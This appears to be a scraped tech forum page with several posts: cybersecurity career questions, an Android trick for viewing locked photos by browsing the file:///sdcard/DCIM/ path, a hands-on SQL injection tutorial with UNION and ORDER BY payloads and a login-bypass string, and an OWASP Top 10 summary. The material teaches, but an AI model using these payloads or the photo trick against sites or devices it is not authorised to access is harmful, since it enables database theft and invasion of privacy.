thanks for posting
-
-
Getting Started with AWS Machine Learning
-
Cyber Security පැත්තට යන්න අදහසක් තියෙනවා Cisco CCNA කරලා...ලංකාවෙ Cyber Security field එක ගැන දන්න අය කියනවද කොහොමද ලංකාවෙ Job Market එක කියලා..තව Cyber Security හරියටම සෙට් කරගන්න ඕනි Exams, Courses ගැනත් අදහසක් දෙන්න පුලුවන් නම් ගොඩක් වටිනවා..RedHat Linux,IMB ,Microsoft වගේ ආයතන වලින් ඉදිරිපත් කරන ඒ ඒ Courses වල වෙනස්කම් වගේ.. :heart_eyes: :heart_eyes: :heart_eyes:
-
Today, I brought you a trick that can be performed in any android phone. I don't know this trick works in IOS as I didn't test it. But, I am 100% sure this will work in android. So, let's get started.
Why you should access locked photos in an android phone?
There may be many reasons for that. If you can't remember your password or pin used for locking the photo content, this trick will definitely help you. And, if you want to amaze or challenge your friend, this is a good trick to perform. And also, if you want to use parental control over your children, this trick will be very important.
What are the requirements to perform this trick?
You just need your Internet browser and no need of Internet connection.
How to perform the trick?
Open your Internet browser. (here, I am using Google Chrome)
Type this URL in the search box.
file:///sdcard/DCIM/Then, you will see a list of photo album folders. Select the one you need. Here, I select 'Camera' folder.
Now, you will be able to see all the photos saved in the 'Camera' folder. So, click one of these photos and you will be able to preview that.
How to prevent from performing this trick to your phone by others?
Performing this trick to your phone by others can easily be avoided by locking your Internet browser.
Enjoy. And don't forget to express your ideas in the comment section about this article. Thank you!
-
These days, we see a lot of workshops, certifications, programmes, even degrees and higher qualification trends happening and since "hacking" sounds exciting or thrilling to most of the youth in our society, they'd naturally be curious and spend a lot of money or effort into this but sadly, very rarely do they know how to approach this correctly.
If you wanted to get into the Networking fields,
You could start off with CCNA, or take the ICND1 and ICND2 exam after which you are CCNA qualified, whereas later on you can do CCNP and establish a more better ground on the aspect or focus on other various qualifications out there.
When it comes to cybersecurity, however, despite needing a networking background and a more established knowledge in systems and operations, there's not much of a well refined career path known to most.
Some suggest starting off with CCNA, then with the Security module, then CEH, CHFI, etc.
I'd like to know from those in the Industry today about how they'd go about with this regard based on the knowledge they have now, and what you'd suggest for any reader here who'd come knocking by wanting to step foot in this path.
-
Hello all,
I hope you know how to do a SQL injection and have used it .In this tutorial we are going to see how it is working. What’s going on under the hood. How web application handle our input and process the SQL quarry. Let’s see.
Imagine that there is a web application like this.
Front-End Web ApplicationHear we see how web application takes input from the user and send that data to PHP script through a GET request.
<html> <head> <title>SQL Injection Tutorial - HacksLand</title> </head> <body> <h1><center>HacksLand - Ethical Hacking Tutorials</center></h1> <form method = "GET" action="index.php"> <h2><center>Give the ID for fetch details</center></h2><br> <input align="center" type="text" name="id"> </form> </body> </html>Back-end PHP Script
Now there should be a back-end script that handle this submitted data and make a SQL quarry.
After SQL quarry return some data from database PHP script processes that data and give user output.
Assume that following is the PHP code .
<?php include("sql_connect.php"); if(isset($_GET['id'])) { $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysqli_query($con, $sql); $row = mysqli_fetch_array($result, MYSQLI_BOTH); if($row) { echo 'Name for ID: '. $row['name']; echo "<br>"; echo 'Age for ID: ' .$row['age']; } else { print_r(mysqli_error($con)); } } else { echo "Please input the ID";} ?>I hope you can understand what is going hear.
For this example we need a table that used by SQL quarry to take data from.
0_1558268758468_table.png
So all OK and fine.
SQL QuarryNow let’s see how this is happening.
Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL quarry?
$sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";So it will give us the output.
Name for ID: Clara
Age for ID : 18Nice!. It’s look like web application is working fine.
Do you remember in our previous tutorial we used a single quote to break a SQL quarry?
what if I enter 3′ as the input?
It give me an error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1′ at line 1What the fuck goes hear?
$sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";You can clearly see that there is a syntax error near ID=’3” . Previously I explained why this happening.
Injecting SQL QuarryNow we have to see how we can fix this error and extract data from the database. What if I enter flowing payload?.
3′ –+
Now our quarry is.
$sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";But actually we only care the code before –+ Because it’s a comment character in SQL and everything after that will be ignored. So now this cod is valid and it’ll give us the output as expected.
This is the time to fetch data from database.But how?
Can we use another SELECT command with this one?
Yes indeed. we can use two SELECT commands with UNION operator like this.
SELECT Name,Age FROM users UNION SELECT Subject,ID FROM usersBut one thing. Both of SELECT quarries must use slimier number of columns to fetch data. It’s no matter that they use different columns , only amount of used columns should be same.
You may say that it’s simple there are 5 columns in table. No buddy in real life you can’t see the table and you can’t figure out how many columns are there. 🙁
We can you a trick for finding the number of columns used by first SELECT command.
Think about our table and following commands.
SELECT * FROM users ORDER BY Name SELECT * FROM users ORDER BY 3first command says select all columns from the users table and the order of results should be accordion to Name column. Second command also says that but results should be order with 3rd column(Age).
So even we don’t know column names we can order by 1,2,3 etc OK.
Now I enter this as the ID .
3′ order by 1–+
Let’s see our quarry.
$sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";This gives us output as expected because there are more columns than 1 . So it’s possible to order result accordion to the first column.
Next we try order by 2. This also will be fine. Web application will work normally until we say order by 5.
What if we enter order by 6 ?
Surely it’ll give an error because there are no 6 columns. So by using this method we can find how many columns are using the first SELECT command. Now we can use another SELECT command
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1What going on hear is SQL quarry think that there is another table like following and quarry try to fetch data from both of them. After those data will be print to screen by PHP code.
Now if we can print data from second table we can find which columns are using by web application to show data.(In this example we know that PHP script get Name and Age columns). But unfortunately we still we can see only flowing output. 🙁
Name for ID: Clara
Age for ID : 18why that? Because while our SQL quarry see there are two tables it first try to fetch data from first table. So if we want to get data from second one we must set a null value to first SELECT command . Our final payload .
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1Since -3 is not in ID column data from our second table will be printed out.
Name for ID: 2
Age for ID : 3Finlay it’s success. We can see column 2 and 3 is used by web app.
Now we can use these 2 channels for get any data from database. 🙂
Extracting Basic informationFirst of all let’s give a try to find out database name.
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1we can see the database name in the screen.
Name for ID: database_name
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1
Age for ID : 3Like this you can use
database() , user() , version() etc to fetch some basic data.
In next tutorial we are going to learn how to use SQL injection to extract more data.
-
What is SQL Injection ?
alt text
SQL Injection is a attack against websites / web applications which are using SQL Database.
Simply, Hacker will insert malicious SQL command and takeover the database.
How Does it Work?Let's say, You have a code like this,
<?php $username = $_POST['username']; $password = md5($_POST['password']); $sql = "SELECT * FROM `users` WHERE username = '$username' AND password = '$password'"; ?>If user input,
Username : admin
Password : admin123The SQL will looks like,
SELECT * FROM `users` WHERE username = 'admin' AND password = '0192023A7BBD73250516F069DF18B500'It will works fine,
But If user input,
If your input,
Username : admin' OR 1 = 1 --
Password : admin123The SQL will looks like,
SELECT * FROM `users` WHERE username = 'admin' OR 1 = 1 --' AND password = '0192023A7BBD73250516F069DF18B500'Here you can see, The password query will be commented (Will not Execute).
And 1 = 1 is always true, The hacker can get all the information of Users.They can delete or change any record too.
Click Here | Watch SQl Injection tutorial
SQL Injection Strings
Click Here | Some injection Strings
How to prevent SQL Injections?Nowadays, Most of the back-end frameworks handle injections itself. But If you don't use any frameworks, You can do it manually.
Every language has built-in functions for handle SQL injections while binding data.
-
-
1. Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
2. Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.
3. Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
4. XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
5. Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
6. Security Misconfiguration
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
7. Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
8. Insecure Deserialization
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
9. Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
10. Insufficient Logging&Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Ref - https://www.owasp.org/index.php/Top_10-2017_Top_10
Injection Attacks ගැන පෝස්ට් එකක් ලගදීම දාන්නම්. :computer: :grin: :the_horns:
-
This topic is deleted!
• Movindu-tb